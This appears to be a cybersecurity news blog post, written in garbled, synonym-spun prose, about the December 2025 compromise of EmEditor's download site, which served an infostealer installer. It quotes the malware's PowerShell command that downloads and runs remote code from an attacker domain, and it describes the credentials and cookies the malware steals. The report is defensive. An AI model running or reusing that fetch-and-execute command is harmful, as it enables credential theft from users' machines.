Skip to content
  • Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form
EmEditor Editor Website Hacked to Deliver Infostealer Malware in Supply Chain Attack

EmEditor Editor Website Hacked to Deliver Infostealer Malware in Supply Chain Attack

Posted on December 30, 2025December 30, 2025 By CWS

A significant provide chain assault focusing on EmEditor, a broadly used textual content editor software program, has uncovered hundreds of thousands of customers to classy infostealer malware.

Between December 19 and December 22, 2025, the official EmEditor web site fell sufferer to unauthorized modification, serving compromised installer recordsdata to unsuspecting customers throughout a essential four-day window.

The corporate confirmed that customers who downloaded model 25.4.3 by means of the Obtain Now button acquired malicious recordsdata as an alternative of authentic software program, creating a major safety breach affecting builders, system directors, and technical professionals worldwide.

The assault exploited the redirect mechanism controlling EmEditor’s obtain pathway. Attackers altered the URL settings that usually directed customers to authentic set up recordsdata, as an alternative pointing them to a malicious model hosted on EmEditor’s WordPress content material listing.

EmEditor Editor (Supply – Qianxin)

The compromised installer was digitally signed by “WALSHAM INVESTMENTS LIMITED,” a non-official group, quite than Emurasoft Inc., the software program’s authentic creator.

PowerShell (Supply – Qianxin)

This spoofed signature added a misleading layer of authenticity that many customers may not have questioned.

Qianxin analysts recognized the malware after cautious forensic examination, revealing a complete information-stealing payload embedded throughout the set up bundle.

The malicious code demonstrated a complicated design that mirrors authentic EmEditor performance, permitting it to function silently throughout and after set up whereas gathering delicate consumer knowledge.

An infection mechanism

The malware’s an infection mechanism operates by means of an embedded VBScript that executes a PowerShell command: powershell.exe “irm emeditorjp.com | iex”.

This command downloads and instantly executes extra malicious code instantly in system reminiscence, bypassing conventional file-based detection strategies.

The payload steals credentials from internet browsers, together with Chrome, Edge, Courageous, and Opera, capturing cookies, login knowledge, and shopping historical past.

It additionally targets credentials from productiveness purposes comparable to Discord, Slack, Zoom, Microsoft Groups, WinSCP, and PuTTY, making a extreme threat for enterprise customers managing delicate communications and infrastructure entry.

The malware employs persistence ways by means of a malicious browser extension named “Google Drive Caching,” which maintains unauthorized entry even after the preliminary an infection.

Google Drive Caching (Supply – Qianxin)

This extension comprises Area Era Algorithm capabilities, permitting the attackers to ascertain resilient command-and-control communications throughout a number of dynamically generated domains.

The extension can steal Fb promoting account credentials, monitor clipboard actions for cryptocurrency tackle alternative assaults, and execute distant instructions to extract extra knowledge or manipulate browser habits.

Victims are suggested to disconnect affected methods instantly, carry out complete malware scans, and reset all credentials used on compromised gadgets.

Comply with us on Google Information, LinkedIn, and X to Get Extra Prompt Updates, Set CSN as a Most well-liked Supply in Google.

Cyber Security News Tags:Attack, Chain, Deliver, Editor, EmEditor, Hacked, InfoStealer, Malware, Supply, Website

Post navigation

Previous Post: Silver Fox Hackers Attacking Indian Entities with Income Tax Phishing Lures
Next Post: Mustang Panda Uses Signed Kernel-Mode Rootkit to Load TONESHELL Backdoor

Related Posts

Qilin Ransomware Leverages TPwSav.sys Driver to Disable EDR Security Measures Qilin Ransomware Leverages TPwSav.sys Driver to Disable EDR Security Measures Cyber Security News
Laravel APP_KEY Vulnerability Allows Remote Code Execution Laravel APP_KEY Vulnerability Allows Remote Code Execution Cyber Security News
Dell Data Breach – Test Lab Platform Hacked by World Leaks Group Dell Data Breach – Test Lab Platform Hacked by World Leaks Group Cyber Security News
APT Groups Attacking Construction Industry Networks to Steal RDP, SSH and Citrix Logins APT Groups Attacking Construction Industry Networks to Steal RDP, SSH and Citrix Logins Cyber Security News
Hackers Abuse Microsoft Teams to Gain Remote Access With PowerShell-based Malware Hackers Abuse Microsoft Teams to Gain Remote Access With PowerShell-based Malware Cyber Security News
Critical Apple 0-Day Flaw Targets High-Profile Users Critical Apple 0-Day Flaw Targets High-Profile Users Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • Top Log Monitoring Tools to Watch in 2026
  • Top Spam Filter Tools for 2026: A Comprehensive Guide
  • Top Fraud Detection Tools for 2026
  • Microsoft Urges Action on Critical Windows Updates
  • Citrix NetScaler Threat: Immediate Action Required

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • March 2026
  • February 2026
  • January 2026
  • December 2025
  • November 2025
  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • Top Log Monitoring Tools to Watch in 2026
  • Top Spam Filter Tools for 2026: A Comprehensive Guide
  • Top Fraud Detection Tools for 2026
  • Microsoft Urges Action on Critical Windows Updates
  • Citrix NetScaler Threat: Immediate Action Required

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Copyright © 2026 Cyber Web Spider Blog – News.

Powered by PressBook Masonry Dark